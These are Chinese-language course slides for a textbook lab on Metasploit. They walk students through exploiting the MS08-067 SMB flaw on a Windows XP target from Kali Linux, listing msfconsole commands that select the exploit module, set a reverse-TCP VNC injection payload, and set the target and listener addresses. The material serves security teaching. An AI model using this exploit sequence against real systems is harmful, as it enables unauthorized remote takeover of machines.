《網(wǎng)絡(luò)空間安全技術(shù)實踐教程》課件14.3課件

第四篇滲透攻擊測試實驗篇第十四章漏洞利用實驗14.3Metasploit攻擊實驗網(wǎng)絡(luò)空間安全技術(shù)實踐教程114.3Metasploit攻擊實驗實驗目的：

熟練掌握Metasploit滲透測試框架的使用，能使用Metasploit獨立完成一次漏洞利用過程。網(wǎng)絡(luò)空間安全技術(shù)實踐教程214.3Metasploit攻擊實驗實驗原理： Metasploit是由Rapid7公司開發(fā)的功能強大的開源滲透測試框架。它提供了優(yōu)秀的模塊化框架和底層基礎(chǔ)庫支持，靈活的插件機制和命令行批處理文件機制，集成了Nmap，Nessus，OpenVAS，SET等優(yōu)秀的滲透測試工具。此外，還可以根據(jù)需求自行編寫擴展腳本進行個性化定制。網(wǎng)絡(luò)空間安全技術(shù)實踐教程314.3Metasploit攻擊實驗實驗原理：

網(wǎng)絡(luò)空間安全技術(shù)實踐教程414.3Metasploit攻擊實驗實驗要點說明：（實驗難點說明）Metasploit滲透測試框架的使用網(wǎng)絡(luò)空間安全技術(shù)實踐教程514.3Metasploit攻擊實驗實驗準備：（實驗環(huán)境，實驗先有知識技術(shù)說明）KaliLinux有MS08-067漏洞的WindowsXP（靶機）網(wǎng)絡(luò)空間安全技術(shù)實踐教程614.3Metasploit攻擊實驗實驗步驟：（1）根據(jù)掃描階段搜集到的信息，選取漏洞進行利用。以WindowsXP系統(tǒng)的MS08-067漏洞為例：

網(wǎng)絡(luò)空間安全技術(shù)實踐教程714.3Metasploit攻擊實驗實驗步驟：（2）終端輸入“msfconsole”打開MSF的命令行交互界面。網(wǎng)絡(luò)空間安全技術(shù)實踐教程814.3Metasploit攻擊實驗實驗步驟：（3）搜索漏洞攻擊程序： msf>searchms08-067網(wǎng)絡(luò)空間安全技術(shù)實踐教程914.3Metasploit攻擊實驗實驗步驟：（4）選擇合適的漏洞攻擊程序：msf>useexploit/windows/smb/ms08_067_netapi網(wǎng)絡(luò)空間安全技術(shù)實踐教程1014.3Metasploit攻擊實驗實驗步驟：（5）顯示可用的攻擊載荷： msf>showpayloads網(wǎng)絡(luò)空間安全技術(shù)實踐教程1114.3Metasploit攻擊實驗實驗步驟：（6）選擇攻擊載荷：msf>setpayloadwindows/vncinject/reverse_tcp網(wǎng)絡(luò)空間安全技術(shù)實踐教程1214.3Metasploit攻擊實驗實驗步驟：（7）查看對目標進行漏洞攻擊之前要設(shè)置的選項： msf>showoptions網(wǎng)絡(luò)空間安全技術(shù)實踐教程1314.3Metasploit攻擊實驗實驗步驟：（8）對選項進行設(shè)置：msf>setRHOST192.168.52.129（設(shè)置攻擊目標IP）msf>setLHOST192.168.52.133（設(shè)置監(jiān)聽者IP）網(wǎng)絡(luò)空間安全技術(shù)實踐教程1414.3Metasploit攻擊實驗實驗步驟：（9）使用“exploit”或“run”命令，對目標發(fā)動漏洞攻擊。網(wǎng)絡(luò)空間安全技術(shù)實踐教程15攻擊成功14.3Metasploit攻擊實驗實驗要求：熟練掌握Metasploit漏洞利用的流程，在完成上述步驟后，進一步熟悉Metasploit各個功能模塊的作用及使用網(wǎng)絡(luò)空間安全技術(shù)實踐教程1614.3Metasploit攻擊實驗實驗擴展要求：嘗試熟練使用Metasploit的各個功能模塊，完成對Windows和Linux系統(tǒng)一些常見漏洞的利用過程